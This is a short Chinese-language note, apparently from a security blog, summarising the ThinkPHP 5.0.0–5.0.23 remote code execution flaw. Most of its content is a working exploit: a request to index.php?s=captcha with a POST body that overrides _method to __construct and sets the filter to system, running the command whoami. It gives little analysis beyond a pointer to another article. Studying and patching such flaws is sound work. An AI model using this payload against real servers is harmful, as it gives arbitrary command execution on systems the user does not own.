thinkphp 漏洞的汇总

5.0.0~5.0.23 RCE

以 thinkphp 5.0.22 完整版为例,下载地址:http://www.thinkphp.cn/down/1260.html
exp:

1
2
3
4
http://127.0.0.1/thinkphp/thinkphp_5.0.22_with_extend/public/index.php?s=captcha

POST:
_method=__construct&filter[]=system&method=get&get[]=whoami

漏洞分析详情可看 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析

参考文章
ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析